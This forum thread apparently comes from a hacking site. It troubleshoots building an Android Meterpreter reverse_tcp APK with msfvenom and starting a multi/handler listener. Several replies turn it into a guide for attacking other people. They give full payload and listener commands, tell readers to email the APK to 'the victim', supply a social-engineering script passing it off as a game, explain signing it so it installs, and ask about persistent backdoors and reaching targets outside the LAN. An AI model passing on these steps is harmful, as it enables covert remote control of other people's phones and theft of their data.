Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?

Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing is that msfpayload was removed and replaced with msfvenom. I used to be able to just do
msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk

Which would create the APK, and then
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ip
To start listening, and it always worked, once the APK was executed on the android device (always my device, btw)

Now, I've tried substituting msfvenom -p for msfpayload, and it creates the APK, but when it is run and the listener is started, it does not connect.

Does anyone know what I'm doing wrong? I can't seem to figure out this new method of things...

58 Responses

Can you give us screenshots and the full command, please?

This is the command used to create the APK, which outputs a "hack.apk" in my root folder:

And this is the command used to start the listener (which used to result in my having control over the Android device, prior to the msfvenom update):

(I blurred names and IPs)
Also, if it makes any difference, I'm running Kali Linux.
And yes, it was intentional :)

It's super simple.
First create a payload :
root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

Now, email this file to the victim, but before you do that:

root@kali :~ # msfconsole
root@kali :~ # use multi/handler
root@kali :~ # set PAYLOAD android/meterpreter/reverse_tcp
root@kali :~ # set LHOST (your ip)
root@kali :~ # set LPORT 5555
root@kali :~ # exploit

Now, wait for the victim to download the file and then install it on his/her phone. Use social engineering to achieve this. Say, for example: "Hey, dude I just made a new game. Unfortunately I don't have anyone to try it out for me and give a review. So, will you help me? Please. Thanks, man, I appreciate it." Just an example!

Now the dumb "FRIEND" will install it and then open it and congrats : YOU GOT A METERPRETER SHELL on someone's phone. Now I'll leave u to ur imagination!

LOL!!! I died laughing when I saw that. I mean it's only his LAN so at least it isn't a bad slip up.

hi! in msfvenom command you missed lport!

Hi there!
The right syntax for msfvenom is:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip -o /testdir/test.apk

I did these steps. After creating the app I tried to install it, but it's showing a parse error. What do I do? Please tell me ......

After generating the payload, sign the .apk with d2j-apk-sign (name of your apk file). Now you have signed your apk file. Send it to the Victim

It says invalid payload :- andriod/meterpreter/reversetcp
What should I do ....?


Same error, "invalid payload", though the syntax is correct. I have checked it many times. What should I do next?

check spelling

May be an obvious question (beginner here), but how do you figure out what lport number to use?

This worked perfect for me :
terminal : msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost {your Ip}
set lport 4444

Once the victim tries to run it in his device. You'll get a meterpreter session.

I did everything, but when I try to install the apk file on my own android device to check, it says application not installed! Please can anyone tell me how to fix this error? Thank you!

Sorry, I built the payload but I can't install it. The error when I install it:
application not installed

Check out my video for this tutorial!

One question.
The process worked perfectly for me.

But when you restart the computer, could you again connect to victim phone and how?

I tried again as well as the first time but nothing:

use exploit/multi/handler
set payload android/meterpreter/reversetcp
set lhost {Ip}
set lport 4444

If anyone knows the answer, how can we connect again on our "infected" phone, or do we need to re-send the file?
Please help.


actually after you exploited ur victim for first time .. then and there create a persistent backdoor that would allow you access all the time .. regardless of system rebooting

And how can i create that persistent backdoor ? armitage ?

Hi guys, everything worked perfectly for me, but when I sent the APK file to my phone it could not be installed. It shows ( parsing error ) because the backdoor file size was "0". I don't know why. Can anyone help please!

u have some syntax error in making the APK file,

msfvenom -p android/meterpreter/reverse_tcp LHOST=" ur IP" LPORT=" the port u want to listen on it" R > /PATH/TO/file.APK

there is an underscore >>> _ <<< between reverse and tcp

Hi guys, greetings. Do you know the cause of this problem when you start the exploit? I have been using it on my Android 5.0 but it always throws me the same fault

Meterpreter session 1 closed. Reason: Died

I can't install the app I created on my phone. What should I do?

when i heck in lan i have no prob

but out lan i get this

Meterpreter session 1 closed. Reason: Died

You also can download the "One Click APK Signer"

Then drag and drop your Payload.apk on the one click signer cmd and it creates a signed Payload.apk that you can install on your victim Android!


i used LPORT=4444 and by online tool i checked and came to know that port 4444 is not open what is problem can anybody tell me.... port 80 is opened and i have tried by making virtual server and port forwarding but nothing worked..... can anybody resolve this port problem?? can i use port 80 for exploiting>>>???

That's because windows firewall blocks the same... add an exception or disable firewall temporarily...

If the app is uninstalled we can't get access to the victim's is there any other way like if it is once installed it can't be removed or running in background script without the use of app

how should i use it for publi is not working for public up...i cannot bind with public ip

I tried the first step using the following command in Kali Linux

msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=4444 R > /root/Upgrader.apk

here is the command with the response can someone explain?

msfvenom -p android/meterpreter/reversetcp LHOST= LPORT=4444 R > /root/Upgrader.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8824 bytes

hey i got this error message did you patch this issue
can you help me

It's right, continue to the next step

i dont have rooted phone ..
is this support new smartphone i try this but not working on my android phone can you help me ..
how to hack normal android phone like unrooted mobiles
can you help me im just a beginner

msfvenom --platform Android -p android/meterpreter/reversetcp LHOST=192.168.x.x R > /root/Upgrader.apk
This command removes the first Platform error; do it for the others (meaning add options for Arch & Encoders too).
But in my case I successfully achieved my target without implementing the arch and encoders options. (Good Luck)

hey guys,

I created the payload file on VMware and I'm trying to copy it onto my host OS, which is Windows, but it isn't happening. The error states that the file doesn't belong to the location any longer. What do I do?

thank you

hey guys,
this is the output i'm getting when i type exploit. what should i do so that this changes

As soon as the Target Executes your Payload the rest will happen.

My exploit stays at this state even when I execute the apk on my phone

For starters guys, anyone who does this needs to learn to troubleshoot their scripts.
All but one person (RAIN RAIN) noticed the "--platform" module missing.

When it spits out an error read what it says, then check the help file (usually "-h" or "--help") to see what options are relevant. Then if all else fails, try google ;)

Try LPORT=8080. That's ONLY port that works for me.

msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT=8080 > /root/Desktop/anything.apk

New terminal:

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 8080

Hey, I could really use some help here...

this is the response that i get after typing the command and follows is either super weird or something super dumb on my part, but im sure one of you smart lads will crack it.. and no, that's not the ip address that i typed.

@Alva-Vostro-3546:~# msfvenom -p android/meterpreter/reversetcp lhost=X.X.X.X lport=4444 R > /root/mmupgrade.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes

Try to replace reversetcp with reverse_tcp

When I gave "use exploit/multi/handler" it's showing command not found ... what is the reason .... guys help me

hi ..!
i'm new here i show your video it's very helpful & i like to know more informations please help me.
when i try i always get like this what can i do...?

I installed the apk on my phone, but when I click the apk nothing happens. I do not get into meterpreter; instead there is a button named ReverseTCP inside the apk which I tried to click, but I didn't get the connection. I am attaching a screenshot of the same. Please tell me where I am going wrong.

Hi, I'm new to the forum and to this Kali Linux thing. I entered the msfvenom -p android/meterpreter/reverse_tcp LHOST= {YOUR IP} LPORT=4444 R > /root/whatever.apk and it works, but then I try to enter msfconsole and I get this. What can be done about this?
